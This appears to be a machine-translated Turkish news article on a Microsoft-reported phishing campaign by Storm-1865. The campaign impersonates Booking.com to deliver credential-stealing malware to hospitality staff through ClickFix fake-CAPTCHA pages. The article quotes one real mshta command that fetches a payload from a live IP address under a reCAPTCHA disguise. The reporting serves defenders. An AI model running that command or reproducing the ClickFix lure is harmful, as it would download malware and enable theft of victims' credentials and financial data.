Microsoft Tehdit İstihbaratı, kimlik bilgisi çalma kötü amaçlı yazılım sunmak için Booking.com’u taklit eden devam eden bir kimlik avı kampanyası belirledi.
Aralık 2024’te başlayan kampanya, Kuzey Amerika, Okyanusya, Asya ve Avrupa’daki misafirperverlik organizasyonlarını hedefliyor.
Bu sofistike saldırı, özellikle bu kuruluşlardaki popüler seyahat platformuyla çalışma olasılığı en yüksek olan bireyleri hedeflemektedir.
Saldırganlar, negatif konuk incelemelerinden hesap doğrulama taleplerine kadar değişen içerikle Booking.com’dan olduğu iddia edilen sahte e -postalar gönderiyor.
Bu mesajlar, Booking.com’un meşru sayfalarını taklit eden hileli web sitelerine yol açan kötü niyetli bağlantılar veya PDF ekleri içerir ve şüpheli olmayan kurbanları kandırmak için ikna edici bir yanılsama oluşturur.
Microsoft’taki güvenlik analistleri, bu kampanyanın kullanıcılara kötü amaçlı yazılım indiren komutları yürütmelerini söyleyen sahte hata mesajları görüntüleyen “ClickFix” adlı bir teknik kullandığını belirtti.
Bu sosyal mühendislik yöntemi, otomatik yürütmeye güvenmek yerine kullanıcı etkileşimi gerektirerek geleneksel güvenlik önlemlerini atlama eğilimleri için insan problem çözme eğilimlerinden yararlanmaktadır.
.webp)
Mağdurlar kötü niyetli bağlantıları tıkladıklarında, sahte bir captcha kaplamasına sahip bir web sayfası, Windows çalışmasını açmak ve otomatik olarak panosuna kopyalanan bir komutu yapıştırmak için bir klavye kısayolu kullanmalarını söyleyen bir web sayfasını görürler.
Tasarım, meşru güvenlik doğrulama sistemlerini taklit ederek kurbanlara yanlış bir güvenlik duygusu verir.
.webp)
Bu komut tipik olarak kötü amaçlı kod indirmek için mshta.exe kullanır: “MSHTA http://92.255.57.155/capcha.html # ‘Ben bir robot değilim – Recaptcha Doğrulama Kimliği: 3781 ′”.
Bu görünüşte zararsız komut, geleneksel güvenlik uyarılarını tetiklemeden tehlikeli kötü amaçlı yazılımların indirilmesini başlatır.
Saldırının teknik anatomisi
Kampanya, Xworm, Lumma Stealer, Venomrat, Asyncrat, Danabot ve Netsupport Rat gibi birden fazla kötü amaçlı yazılım ailesi sunuyor. Bu, hileli kullanım için finansal veriler ve kimlik bilgileri çalın.
.webp)
Enfeksiyon zinciri kimlik avı e -postasıyla başlar, sahte captcha sayfasından geçer ve kurbanlar ClickFix talimatlarını izlediklerinde tamamlanır.
Microsoft bunu 2023’ün başından beri benzer kampanyalar yürüten bir tehdit aktörü olan Storm-1865 olarak izliyor.
Taktiklerine ClickFix eklenmesi, bu tehdit aktörünün güvenlik önlemlerini atlatmak için nasıl geliştiğini, özellikle de görevlerinin bir parçası olarak Booking.com ile düzenli olarak etkileşime giren misafirperverlik personelini hedeflediğini gösteriyor.
Kötü amaçlı yazılımların yetenekleri, tarayıcılardan depolanmış şifreleri çalmak, finansal bilgileri yakalamak ve potansiyel olarak tehlikeye atılan sistemlere uzaktan erişim sağlamak ve saldırganların kurbanın ağı içinde daha fazla kötü amaçlı faaliyetler yapmalarını sağlamaktır.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.